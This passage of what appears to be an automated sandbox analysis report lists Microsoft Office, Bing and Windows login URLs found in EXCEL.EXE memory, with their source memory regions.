      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EXCEL.EXE, 00000000.00000002.933587531.0000000013059000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comZ
      Source: EXCEL.EXE, 00000000.00000002.933761146.0000000013153000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782387248.0000000013153000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientl
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
      Source: EXCEL.EXE, 00000000.00000002.933545976.0000000013026000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: EXCEL.EXE, 00000000.00000002.933545976.0000000013026000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingLt
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: EXCEL.EXE, 00000000.00000002.933545976.0000000013026000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933761146.0000000013153000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782387248.0000000013153000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechF
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://lifecycle.office.com
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comP
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/J
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizesR
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://login.windows.local
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localtes/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize&6
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(R
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)Q
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)S
      Source: EXCEL.EXE, 00000000.00000003.801049819.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787311248.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.932505798.000000000F88C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742840890.000000000F88C000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize018
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize47
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize4V
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize56
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize65
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize7K
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8Q
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8S
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize9R
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize:Q
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;7
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;V
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?R
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeB
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeBR
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCQ
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCS0
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeG_
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH5A
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeHT1
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeIK0
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeO6
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQR8
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeRSC
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeSR
